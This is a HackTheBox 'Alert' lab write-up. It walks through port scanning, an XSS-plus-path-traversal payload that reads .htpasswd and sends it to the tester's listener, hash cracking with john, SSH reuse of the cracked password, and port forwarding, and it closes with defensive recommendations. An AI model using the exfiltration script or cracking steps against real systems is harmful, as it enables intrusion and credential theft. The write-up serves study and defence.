Alert Machine Lab Retrospective

Disclaimer: This article is a personal technical study note. Any operations described should only be performed in authorized environments. Users bear full responsibility for any misuse.

This article reviews the HackTheBox Alert machine: how each flag is reached, which configuration weaknesses make the path possible, and what the machine is worth learning from an operations standpoint.

Target

  • 10.10.11.44

Enumeration starts with a full TCP port scan.

1
nmap -sS -T4 -sV 10.10.11.44 -O -A -v -p-

image-20241129145913989

Only two ports are open and neither is filtered: 22 (SSH) and 80 (HTTP). The web application expects a host name, so the machine’s address is mapped in the hosts file.

1
2
# vim /etc/hosts
alert.htb [Machine IP Address]

The application is a file sharing page with an upload form.

image-20241129150357006

Directory enumeration against the virtual host reveals the application’s structure.

1
python3 dirsearch.py -u http://alert.htb

image-20241129151558628

The interesting finding is that the message viewer takes a file path from the query string and returns the file’s content. Two problems combine here: the parameter is not confined to a base directory, and the same page renders user-supplied content without encoding, so a script injected through the page is executed in the context of the site’s origin. The two together allow the server to be used as the reader of its own files: the injected script requests the file through the vulnerable parameter and forwards the response to a listener controlled by the tester over the lab VPN.

1
2
3
4
5
6
7
<script> 
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
.then(response => response.text())
.then(data => {
fetch("http://10.10.16.20/?file_content=" + encodeURIComponent(data));
});
</script>

image-20241129155724546

The returned content is an Apache password file with an apr1 (MD5-crypt) hash for the account albert.

1
2
<pre>albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
</pre>

MD5-crypt is a fast, unsalted-per-installation format, so it is well within reach of a dictionary attack.

1
john - wordlist=/usr/share/wordlists/rockyou.txt - format=md5crypt-long "albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ"

image-20241129160044591

The recovered credential for albert:

1
2
albert
manchesterunited

It is reused for SSH, which yields the first flag.

image-20241129160204119

The machine has a second, internal-only segment.

image-20241129160245514

Because the upload form writes files that the web server executes, a short PHP script placed there runs with the web server’s privileges; in this lab it was used to open a connection back to the tester’s host. Script execution inside an upload directory is what turns the upload form from a feature into remote code execution.

An internal statistics application listens on port 8080 of the loopback interface. It can be reached through SSH local port forwarding with the recovered credentials, without exposing the service beyond the machine.

1
2
ssh -L 8080:127.0.0.1:8080 -vl albert alert.htb
manchesterunited

image-20241129161249626

The statistics application runs with higher privileges and provides the second flag.

image-20241129161720062

防御启示

  • Upload handling: validate the real content type rather than the extension, generate unpredictable file names, store uploads outside the document root or on object storage, and disable script execution in any directory that accepts user files. Alert’s chain begins with a file the web server is willing to execute.
  • Path traversal in file APIs: canonicalize the resolved path and verify it stays inside an allow-listed base directory before reading. Application processes should not be able to read credential files at all, so keep .htpasswd, .env and key material outside the web root and out of the reach of the web server’s OS user.
  • Credential storage and reuse: apr1/MD5-crypt hashes are fast to attack — use bcrypt, scrypt or Argon2, enforce a password policy that excludes dictionary words, and never reuse the same account between an internal application and SSH. Add MFA for any externally reachable login.
  • Egress control: the data-exfiltration step only worked because the web server could open outbound HTTP connections to an arbitrary host. Restrict outbound traffic with an allow-list proxy and alert on web-server processes initiating connections to new destinations.
  • Internal management interfaces: binding a service to loopback is not an access control measure — port forwarding converts the lab’s SSH foothold into direct access to the internal application. Put internal admin interfaces behind SSO with per-user accounts, log every login and request, and patch the exposed application instead of relying on network position.

Support via Solana

Solana

Solana

Solana Pay

Solana Pay

WeChat

WeChat